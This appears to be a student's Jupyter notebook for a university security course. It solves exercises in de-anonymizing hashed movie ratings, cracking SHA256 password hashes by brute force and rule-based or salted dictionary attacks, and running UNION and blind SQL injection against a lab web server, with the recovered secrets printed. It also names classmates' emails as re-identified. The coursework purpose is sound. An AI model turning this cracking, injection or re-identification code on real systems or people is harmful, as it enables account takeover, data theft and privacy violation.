# Exercise 1: Find out about your favorite movies

In this exercise you have to
de-anonymize the dedis-database that holds your secret movie-ratings.

The database is
given to you as a csv-file with the following format:

`sha256(salt | email), sha256(salt | movie), date, rating`

The salt is the same for the whole database. There are 189 emails that correspond to the
students and teachers of COM-402. Your goal is to find out what movies you rated in the
dedis-database.

To de-anonymize the list, you get a second csv-file from IMDb in the format below. This
second list is smaller than the first list.
`email, movie, date, rating`

For all sub-exercises, the entries in the IMDb are a strict subset of the entries in the
dedis-database.

The exercise has 3 sets of csv-files (`dedis-db` and `IMDb-db`), with increasing difficulty to
recover the movies you rated:

### 1 Dates are giving it away - each user rated the movie at the same date in both `dedis-db` and `IMDb-db`.

_**Hint**: some dates might have more than one rating, so you need to make sure you remove these doubles._

In [None]:
import pandas as pd

col_names = {"imdb": ["email", "movie", "date", "rating"],
    "dedis": ["salted-email", "salted-movie", "date", "rating"]}

lu_email = "lucia.monterosanchis@epfl.ch"

data = {}
for i in range(1,4):
    for ds in ["dedis", "imdb"]:
        name = "{}-{}".format(ds, i)
        data[name] = pd.read_csv("Lucia_MonteroSanchis_259236/hw3_ex1_{}/{}.csv".format(lu_email, name),
            skipinitialspace=True, quotechar='"', names=col_names[ds])

data_i = data["imdb-1"].copy()
data_d = data["dedis-1"].copy()
movies = {}  # Dictionary with salted and unsalted movies
emails = {}  # Dictionary with salted and unsalted emails

# 1. Group imdb data by email
grouped_i = data_i.groupby("email")

# 2. Group dedis data by salted email
grouped_d = data_d.groupby("salted-email")

# 3. Iterate over each unique salted email in dedis, and unique email in imdb
seen_emails = []  # to check if there are duplicates!
for g_d in grouped_d:
    # get set of dates
    dates_d = set(g_d[1]["date"])
    for g_i in grouped_i:
        # get set of dates
        dates_i = set(g_i[1]["date"])
        # 3.1 check if the imdb dates is subset of dedis dates
        if dates_i.issubset(dates_d):
            # they're the same user!
            seen_emails.append(g_i[0])  # to check if there are duplicates
            # 3.2 add email and salted email to dictionary
            emails[g_i[0]] = g_d[0]
            # 3.3 join on date to get salted movie names related to unsalted
            combined_df = g_d[1].join(g_i[1].set_index(g_i[1]["date"]),
                on="date", how="inner", lsuffix='_left', rsuffix='_right')
            # 3.4 update the movies dictionary with the new findings
            movies.update(dict(zip(combined_df["salted-movie"],
                combined_df["movie"])))

# just in case...
if(len(seen_emails) - len(set(seen_emails))):
    print("There were duplicates!!!")

# 4. Save file with my movie ratings
f = open('Lucia_MonteroSanchis_259236/solutions/1a.txt','w')
for m in grouped_d.get_group(emails[lu_email])["salted-movie"]:
    f.write(movies[m])
    f.write('\n')
f.close()

### 2 The dates are random, reflecting the fact that you won’t rate a movie the same day with Netflix and the IMDb. However, a simple frequency-attack on the movies is enough to map the movies to the hashes, then you’ll have to fit the IMDb with the dedis-database.

_**Hint**: Once you mapped the hashes of the movies to the plain names of the movies, search for any user who rated all films you find in its public ratings._

In [None]:
import pandas as pd

col_names = {"imdb": ["email", "movie", "date", "rating"],
    "dedis": ["salted-email", "salted-movie", "date", "rating"]}

lu_email = "lucia.monterosanchis@epfl.ch"

data = {}
for i in range(1,4):
    for ds in ["dedis", "imdb"]:
        name = "{}-{}".format(ds, i)
        data[name] = pd.read_csv("Lucia_MonteroSanchis_259236/hw3_ex1_{}/{}.csv".format(lu_email, name),
            skipinitialspace=True, quotechar='"', names=col_names[ds])

data_i = data["imdb-2"].copy()
data_d = data["dedis-2"].copy()

def update(dictionary, k, v):
    """Function used to add a new sample to an existing dictionary.
    If key k is already defined it appends value v to k's list
    If key k is not defined, associates it with a singleton list
        containing v.
    """
    if k in dictionary.keys():
        dictionary[k].append(v)
    else:
        dictionary[k] = [v]

# 1. Group imdb data by movie and by email
grouped_u_i = data_i.groupby("email")
grouped_m_i = data_i.groupby("movie")

# 2. Group dedis data by salted movie and by email
grouped_u_d = data_d.groupby("salted-email")
grouped_m_d = data_d.groupby("salted-movie")

# 3. Create dictionary mapping movie names and freqs of appearance
count_m_i = grouped_m_i['email'].count().to_dict()
count_m_d = grouped_m_d['salted-email'].count().to_dict()

# 4. Sort dictionaries by freqs of appearance and do the mapping
import operator
sorted_i = sorted(count_m_i.items(), key=operator.itemgetter(1))
sorted_d = sorted(count_m_d.items(), key=operator.itemgetter(1))

movies = {ed[0]: ei[0] for (ei, ed) in zip(sorted_i, sorted_d)}

# 5. Iterate over each unique salted email in dedis, and unique email in imdb
emails = {}
for g_d in grouped_u_d:
    movies_d = set(g_d[1]["salted-movie"])
    movies_d_unsalted = {movies[m] for m in movies_d}
    for g_i in grouped_u_i:
        movies_i = set(g_i[1]["movie"])
        # 5.1 check if imdb movies is subset of dedis movies
        if movies_i.issubset(movies_d_unsalted):
            # 5.2 add email and salted email to dictionary
            update(emails, g_i[0], g_d[0])

# 6. Save file with my movie ratings
f = open('Lucia_MonteroSanchis_259236/solutions/1b.txt','w')
for m in grouped_u_d.get_group(emails[lu_email][0])["salted-movie"]:
    f.write(movies[m])
    f.write('\n')
f.close()

### 3 More realistic database
Dates of ratings in dedis-database and IMDb are not the
same, but similar. Dates are within 14 days, with a triangular distribution, using
python’s random.choices  and a weight of [1, 2, 3, …, 14, 13, 12, …, 1].

_**Hint**: First search for user-name hash/plaintext overlap and fit those to find the hash
of your email. Then you can search for the closest overlap of the public ratings and
the anonymous ratings of your email._

In [1]:
import pandas as pd

col_names = {"imdb": ["email", "movie", "date", "rating"],
    "dedis": ["salted-email", "salted-movie", "date", "rating"]}

lu_email = "lucia.monterosanchis@epfl.ch"

data = {}
for i in range(1,4):
    for ds in ["dedis", "imdb"]:
        name = "{}-{}".format(ds, i)
        data[name] = pd.read_csv("Lucia_MonteroSanchis_259236/hw3_ex1_{}/{}.csv".format(lu_email, name),
            skipinitialspace=True, quotechar='"', names=col_names[ds])

data_i = data["imdb-3"].copy()
data_d = data["dedis-3"].copy()

def update(dictionary, k, v):
    """Function used to add a new sample to an existing dictionary.
    If key k is already defined it appends value v to k's list
    If key k is not defined, associates it with a singleton list
        containing v.
    """
    if k in dictionary.keys():
        dictionary[k].append(v)
    else:
        dictionary[k] = [v]

# 1. Group imdb data by movie and by email
grouped_u_i = data_i.groupby("email")
grouped_m_i = data_i.groupby("movie")

# 2. Group dedis data by salted movie and by email
grouped_u_d = data_d.groupby("salted-email")
grouped_m_d = data_d.groupby("salted-movie")

# 3.1 Define function for next step
def check_dates(dates_i, dates_d):
    """Iterates over dates_i and dates_d.
    Checks if for each d_i in dates_i there is at least one
    date in dates_d so that both are within 14 days.
    """
    for d_i in dates_i:
        if not find_close_date(d_i, dates_d):
            return False
    else:
        return True
    
def make_date(d, separator="/"):
    """Transform string into date object"""
    from datetime import date
    d_v = d.split(separator)
    return date(int('20'+d_v[2]), int(d_v[1]), int(d_v[0]))

def find_close_date(d_i, dates_d, close=14):
    """Returns True if theres a date close to d_i in dates_d"""
    f_d_i = make_date(d_i)
    for d_d in dates_d:
        f_d_d = make_date(d_d)
        delta = f_d_i - f_d_d
        if abs(delta.days) <= close:
            return True
    else:
        return False

# 3.2 Iterate over each salted movie in dedis, and movie in imdb
# creating a dictionary of movie and hashed movie pairs
movies = {}
missing_movies = []
for g_i in grouped_m_i:
    dates_i = g_i[1]["date"]
    for g_d in grouped_m_d:
        dates_d = g_d[1]["date"]
        if check_dates(dates_i, dates_d):
            movies[g_d[0]] = g_i[0]
            break
    else:
        missing_movies.append(g_i[0])

# 3.3 Get the hashed titles for the missing movies
missing_salted_movies = [g_d[0] for g_d in grouped_m_d
    if g_d[0] not in movies.keys()]

# 4 Get the missing movies
# 4.1 Find user movies
movies_d_unsalted = []
u_movies = {}
emails = {}
for g_i in grouped_u_i:
    movies_i = set(g_i[1]["movie"])
    for g_d in grouped_u_d:
        movies_d = list(g_d[1]["salted-movie"])
        movies_d_unsalted = [movies[m] for m in movies_d if m in movies]
        if movies_i.issubset(movies_d_unsalted):
            emails[g_d[0]] = g_i[0]
            if (len(movies_d_unsalted) - len(movies_d)):
                u_movies[g_d[0]] = set(movies_d) - set(movies.keys())

# 4.2 try with the users we mapped
for m in missing_movies:
    for h_m in missing_salted_movies:
        for h_e, e in emails.items():
            gd = grouped_u_d.get_group(h_e)["salted-movie"]
            if h_m in list(gd):
                gi = grouped_u_i.get_group(e)["movie"]
                if m in list(gi):
                    print(":)")
                    
# 4.3 The previous didn't work! need to map some more users...
users_list = list([g[0] for g in grouped_u_i if g[0] not in emails.values()])
h_users_list = list([g[0] for g in grouped_u_d if g[0] not in emails])

# 4.3.1 I'll keep only the ones who voted some missing movie
users_list_= [u for u in users_list if missing_movies[0]
    in list(grouped_u_i.get_group(u)["movie"])]

# 4.3.2 and I remove the ones who also voted the other missing movie
users_list = [u for u in users_list_ if missing_movies[1]
    not in list(grouped_u_i.get_group(u)["movie"])]

# 4.3.3 and I do the same with the dedis data
h_users_list_ = [u for u in h_users_list if missing_salted_movies[0]
    in list(grouped_u_d.get_group(u)["salted-movie"])]

h_users_list_0 = [u for u in h_users_list_ if missing_salted_movies[1]
    not in list(grouped_u_d.get_group(u)["salted-movie"])]

h_users_list_ = [u for u in h_users_list if missing_salted_movies[1]
    in list(grouped_u_d.get_group(u)["salted-movie"])]

h_users_list_1 = [u for u in h_users_list_ if missing_salted_movies[0]
    not in list(grouped_u_d.get_group(u)["salted-movie"])]

# 4.3.4 now I try to map someone in h_users_list_0
# with someone in users_list
inv_movies = {v: k for k, v in movies.items()}

h_candidate = h_users_list_0[0]
h_movies_cand = grouped_u_d.get_group(h_candidate)
c_dates_0 = {}

for c_i in users_list:
    movies_cand = grouped_u_i.get_group(c_i)
    x = [inv_movies[m] in list(h_movies_cand["salted-movie"]) for m in movies_cand["movie"]
        if m in inv_movies]
    c_dates_0[c_i] = x.count(True) / (x.count(True) + x.count(False))

# I keep the best mapping for h_users_list_0
import operator
max_arg_0 = max(c_dates_0.items(), key=operator.itemgetter(1))[0]
print("{}: {}".format(max_arg_0, c_dates_0[max_arg_0]))

# 4.3.5 now I try to map someone in h_users_list_1
# with someone in users_list
inv_movies = {v: k for k, v in movies.items()}

h_candidate = h_users_list_1[0]
h_movies_cand = grouped_u_d.get_group(h_candidate)
c_dates_1 = {}

for c_i in users_list:
    movies_cand = grouped_u_i.get_group(c_i)
    x = [inv_movies[m] in list(h_movies_cand["salted-movie"]) for m in movies_cand["movie"]
        if m in inv_movies]
    c_dates_1[c_i] = x.count(True) / (x.count(True) + x.count(False))

# I keep the best mapping for h_users_list_1
max_arg_1 = max(c_dates_1.items(), key=operator.itemgetter(1))[0]
print("{}: {}".format(max_arg_1, c_dates_1[max_arg_1]))

# 4.3.6 I compare the results for the two best mappings I got before

candidate = None

if c_dates_0[max_arg_0] > c_dates_1[max_arg_1]:
    candidate = max_arg_0
else:
    candidate = max_arg_1

# I was able to match Jeremy.Corcoba@unil.ch!

# 4.4 Now I use his ratings to find the missing matches and    
# add the found movie to 'movies'
movies[[hm for hm in grouped_u_d.get_group(h_candidate)["salted-movie"]
    if hm not in movies][0]] = [m for m in grouped_u_i.get_group(candidate)["movie"]
    if m not in inv_movies][0]

movies[[hm for hm in missing_salted_movies if hm not in movies.keys()][0]] = [m
    for m in missing_movies if m not in movies.values()][0]

# 5 Find my movies
movies_d_unsalted = []
movies_i = set(grouped_u_i.get_group(lu_email)["movie"])
lu_movies_salted = []
lu_movies = []
for g_d in grouped_u_d:
    movies_d = g_d[1]["salted-movie"]
    movies_d_unsalted = {movies[m] for m in movies_d if m in movies}
    if movies_i.issubset(movies_d_unsalted):
        lu_movies = movies_d_unsalted
        lu_movies_salted = movies_d
        if not len(lu_movies) == len(lu_movies_salted):
            print("{} movie(s) missing!".format(len(lu_movies_salted) - len(lu_movies)))
            
# 6 Save file with my movie ratings
f = open('Lucia_MonteroSanchis_259236/solutions/1c.txt','w')
for m in lu_movies:
    f.write(m)
    f.write('\n')
f.close()

aurelien.monbaron@epfl.ch: 0.42857142857142855
Jeremy.Corcoba@unil.ch: 1.0


# Exercise 2: L33t hax0r5

In the txt file you will find 10 password hashes for each part of
the exercise. Your goal is to crack those hashes and reveal the passwords.

### 1 Brute force
In this part you should implement a brute-force attack. Passwords are randomly generated
from the set of lowercase letters and digits (‘abcd...xyz0123...9’) and have length 4, 5, or 6
characters. Generated passwords are then hashed with SHA256 and corresponding
hexdigests are sent to you in the file.

In [None]:
# Read file
with open("Lucia_MonteroSanchis_259236/hw3_ex2.txt") as f:
    content = f.readlines()

# remove whitespace characters at the end of each line
content = [x.strip() for x in content]

# Get strings for this exercise
ex2a = content[1:11]

import string

# Generate set of possible characters
chars = string.digits + string.ascii_lowercase

import itertools
import hashlib

# Dictionary to store the found passwords
found_pwd = {}

# Check all possible combinations of characters
for length in range(4,7):
    for w in map(''.join, itertools.product(*[chars]*length)):
        # get hash
        hashed_w = hashlib.sha256(w.encode('utf-8')).hexdigest()
        # compare
        if hashed_w in ex2a:
            found_pwd[hashed_w] = w
            print(w)
        if len(found_pwd) >= 10:
            break
    if len(found_pwd) >= 10:
        break

# Save file with the found passwords
f = open('Lucia_MonteroSanchis_259236/solutions/2a.txt','w')
f.write(found_pwd[ex2a[0]])
for k in ex2a[1:]:
    f.write(', ')
    f.write(found_pwd[k])
f.close()

### 2 Dictionary attack with rules
In this part you should
implement a dictionary attack. We generate a password by selecting a word from a
large dictionary and then randomly applying some of the common user modifications:
- capitalize the first letter and every letter which comes after a digit. For example, `com402dedis` becomes `Com402Dedis`. This is achieved by `title()`, e.g. `'com402dedis'.title()`
- change `e` to `3`
- change `o` to `0`
- change `i` to `1`

In the file you received you will find the SHA256 hexdigests of passwords generated in this
way. Your task is to crack them using a dictionary attack.
Dictionaries can be found online (e.g. https://wiki.skullsecurity.org/Passwords).

_**Note 1**: the words we used to generate passwords only contain uppercase and lowercase letters and digits._

_**Note 2**: Not all dictionaries are the same, be aware that if you implement the attack correctly
but you can't crack the passwords, then you might be using a dictionary which doesn't
contain all the words as the dictionary we used._

In [None]:
# 1. Read file
with open("Lucia_MonteroSanchis_259236/hw3_ex2.txt") as f:
    content = f.readlines()
# you may also want to remove whitespace characters like `\n` at the end of each line
content = [x.strip() for x in content]

# 2. Get strings for this exercise
ex2b = content[12:22]

import string

# 3. Generate set of possible characters
chars = string.digits + string.ascii_lowercase + string.ascii_uppercase

# 4. Define rules
def change(string, nb):
    if nb == 0:
        return string.title()
    elif nb == 1:
        return string.replace("e", "3").replace("E", "3")
    elif nb == 2:
        return string.replace("o", "0").replace("O", "0")
    else:
        return string.replace("i", "1").replace("I", "1")

# Dictionary to store found passwords
found_pwd = {}

# 5. Load dictionary
import bz2

dictionary = set()
with bz2.open("rockyou.txt.bz2", "rt", encoding="ISO-8859-1") as bz_file:
    for line in bz_file:
        word = line.rstrip()
        if all(char in chars for char in word):
            dictionary.add(word)

# 6. Iterate through the dictionary, applying all possible modifications
import hashlib

for w in dictionary:
    for w_0 in [w, change(w, 0)]:
        for w_1 in [w_0, change(w_0, 1)]:
            for w_2 in [w_1, change(w_1, 2)]:
                for w_3 in [w_2, change(w_2, 3)]:
                    # check if w_3 is in passwords
                    h_w = hashlib.sha256(w_3.encode('utf-8')).hexdigest()
                    if h_w in ex2b:
                        found_pwd[h_w] = w_3
                        print(w_3)
                    if len(found_pwd) >= 10:
                        break
                if len(found_pwd) >= 10:
                    break
            if len(found_pwd) >= 10:
                break
        if len(found_pwd) >= 10:
            break
    if len(found_pwd) >= 10:
        break

# 7. Save file with the found passwords
f = open('Lucia_MonteroSanchis_259236/solutions/2b.txt','w')
f.write(found_pwd[ex2b[0]])
for k in ex2b[1:]:
    f.write(', ')
    f.write(found_pwd[k])
f.close()

### 3 Dictionary attack with salt
Once you have a dictionary you can compute the hashes of all those words in it, and
create a lookup table. This way, each next password you want to crack is nothing more than
a query in the lookup table. Because of this, passwords are usually ‘salted’ before hashing.

In this part of the exercise you should implement another attack using a dictionary. We
generate a password by simply selecting a random word from a dictionary and appending a
random salt to it. The password is then hashed with SHA256 and hexdigest and salt are sent
to you in the file. Your task is to crack the passwords using a dictionary.

_**Note**: Salt is exactly two characters long and it contains only hexadecimal characters._

In [1]:
# 1. Read file
with open("Lucia_MonteroSanchis_259236/hw3_ex2.txt") as f:
    content = f.readlines()
# you may also want to remove whitespace characters like `\n` at the end of each line
content = [x.strip() for x in content]

# 2. Get data for this exercise
ex2c_s = [c.split(", ")[0] for c in content[23:]]
ex2c_p = [c.split(", ")[1] for c in content[23:]]

import string

# 3. Generate set of possible characters
chars = string.digits + string.ascii_lowercase + string.ascii_uppercase

# 4. Load dictionary
import bz2

dictionary = set()
with bz2.open("rockyou.txt.bz2", "rt", encoding="ISO-8859-1") as bz_file:
    for line in bz_file:
        word = line.rstrip()
        if all(char in chars for char in word):
            dictionary.add(word)
            
# Dictionary to store found passwords
found_pwd = {}

# 6. Iterate through the dictionary
# append all possible salts, then hash and compare to the pwds
import hashlib

for w in dictionary:
    for s in ex2c_s:
        w_s = w+s
        h_w = hashlib.sha256(w_s.encode('utf-8')).hexdigest()
        if h_w in ex2c_p:
            found_pwd[h_w] = w
            print(w)
        if len(found_pwd) >= 10:
            break
    if len(found_pwd) >= 10:
        break

# 7. Save file with the found passwords
f = open('Lucia_MonteroSanchis_259236/solutions/2c.txt','w')
f.write(found_pwd[ex2c_p[0]])
for k in ex2c_p[1:]:
    f.write(', ')
    f.write(found_pwd[k])
f.close()

# 3

In [1]:
import base64
x = "V2VsbCwgdGhhdCBzaXRlIHNtZWxscyBsaWtlIHNvbWUgU1FMIGluamVjdGlvbnMgYXJlIHBvc3NpYmxlIExvb2sgYXQgYC9yb290L3N0YXJ0dXAuc2hgIHRvIHNlZSBob3cgdGhlIFNRTCBzY2hlbWEgbG9va3MgbGlrZSE="
print(base64.b64decode(x).decode())

Well, that site smells like some SQL injections are possible Look at `/root/startup.sh` to see how the SQL schema looks like!


You should try requesting both valid and invalid SQL queries and check their output.

### 3a

In [2]:
x = "089 111 117 032 100 111 110 226 128 153 116 032 097 108 119 097 121 115 032 110 101 101 100 032 097 032 102 111 114 109 032 102 111 114 032 083 081 076 032 105 110 106 101 099 116 105 111 110 115 032 059 041"
x = x.split(" ")
x = ''.join([format(int(i), '02x') for i in x])
print(bytearray.fromhex(x).decode())

You don’t always need a form for SQL injections ;)


In [1]:
from bs4 import BeautifulSoup
import json
import requests

url = "http://172.17.0.2/personalities?id=1' union all select mail, message from contact_messages where mail='james@bond.mi5"

response = requests.get(url)

soup = BeautifulSoup(response.content, 'html.parser')
x = soup.body.find_all('a')
print(x[1].contents[0].split(':')[1])


mahoney verde athena pershing hegelian lucas schlegel lazarus chopin orpheus


### 3b

You should try requesting both valid and invalid SQL queries and check their output.

In [1]:
from bs4 import BeautifulSoup
import json
import requests

url = "http://172.17.0.2/messages"
headers = headers = {'Content-Type': "application/x-www-form-urlencoded"}

def analyze_response(response):
    soup = BeautifulSoup(response.content, 'html.parser')
    if '200' in str(response):
        if "The name exists !" in str(soup.body):
            return 0
        else:
            return 1
    else:
        print(soup.prettify())
        return 2

# get password length
for length in range(100):
    payload = "name=0' union all select password, password from users where CHAR_LENGTH(password)={} and name='inspector_derrick".format(length)
    response = requests.post(url, data=payload, headers=headers)
    result = analyze_response(response)
    if not result:
        break

import string

# Generate set of some characters
chars = string.digits + string.ascii_lowercase + string.ascii_uppercase

# get password length
pwd_chars = []

for c in chars:
    payload = "name=0' union all select password, password from users where password like '%{}%' and name='inspector_derrick".format(c)
    response = requests.post(url, data=payload, headers=headers)
    result = analyze_response(response)
    if not result:
        pwd_chars.append(c)

ordered_char = []
for i in range(length):
    for c in pwd_chars:
        payload = "name=0' union all select password, password from users where password like '{}{}%' and name='inspector_derrick".format(''.join(ordered_char), c)
        response = requests.post(url, data=payload, headers=headers)
        result = analyze_response(response)
        if not result:
            ordered_char.append(c)
print(''.join(ordered_char))

868c39d2ef916de
